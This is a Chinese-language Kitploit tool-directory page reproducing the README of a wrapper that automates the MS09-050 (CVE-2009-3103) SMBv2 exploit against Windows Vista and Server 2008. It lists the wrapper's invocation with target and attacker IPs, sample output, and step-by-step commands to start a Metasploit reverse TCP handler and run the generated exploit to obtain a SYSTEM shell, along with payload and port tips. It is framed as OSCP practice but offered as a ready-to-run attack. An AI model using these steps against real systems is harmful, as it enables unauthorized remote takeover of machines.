Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ms09-050-CVE-2009-3103-exploit — 针对 Windows Vista/Server 2008 上 SMBv2 的 MS09-050 (CVE-2009-3103) 自动利用封装工具。生成 shellcode,构建漏洞利用,并创建 Metasploit 处理器以获取 SYSTEM shell 访问权限。 | Kitploit
工具/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Payload生成漏洞分析漏洞利用Shellcode渗透测试学习与教育
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

针对 Windows Vista/Server 2008 上 SMBv2 的 MS09-050 (CVE-2009-3103) 自动利用封装工具。生成 shellcode,构建漏洞利用,并创建 Metasploit 处理器以获取 SYSTEM shell 访问权限。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
28个月前尚未审核

MS09-050 SMBv2 利用包装器

MS09-050 (CVE-2009-3103) 漏洞利用的一行设置。无需折腾,无需调试,直接生效。

为什么?

大多数流传的 MS09-050 脚本需要手动注入 shellcode,与处理程序存在时序问题,或者干脆无法运行。本包装器:

  • 生成带正确参数的 shellcode
  • 自动构建漏洞利用代码
  • 创建可直接使用的 Metasploit 处理程序
  • 精确告知需要运行的命令

专为 OSCP 备考打造,时间至关重要。

目标

  • 漏洞: MS09-050 / CVE-2009-3103
  • 影响范围: Windows Vista SP1/SP2, Windows Server 2008 (R2 之前)
  • 服务: 端口 445 上的 SMBv2
  • 结果: SYSTEM 权限 shell

要求

  • Kali Linux (或任何安装了 Metasploit 的发行版)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (通常预装)

用法

root@kitploit:~
./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]

示例

root@kitploit:~
./ms09_050.sh 192.168.233.40 192.168.45.232 443

输出:

root@kitploit:~
[*] 目标: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] 正在生成 shellcode...
[+] 已创建文件:
    - exploit.py
    - handler.rc

=== 运行 ===

终端 1:  msfconsole -q -r handler.rc
终端 2:  python2 exploit.py 192.168.233.40

执行

  1. 终端 1 — 启动处理程序:

    root@kitploit:~
    msfconsole -q -r handler.rc
    

    等待显示:Started reverse TCP handler on ...

  2. 终端 2 — 运行漏洞利用:

    root@kitploit:~
    python2 exploit.py 192.168.233.40
    
  3. 查看终端 1 获取 shell。

注意事项

  • 使用分阶段载荷 (windows/shell/reverse_tcp) — 与此漏洞利用中的 stager 配合稳定
  • 如果利用失败,目标可能需要重启或本身就不可利用
  • 如果 4444 端口被过滤,建议使用 443 端口

致谢

原始漏洞利用基于 ohnozzy 的 MS09-050 PoC。

许可证

MIT — 做你想做的,只是不要作恶。

下载工具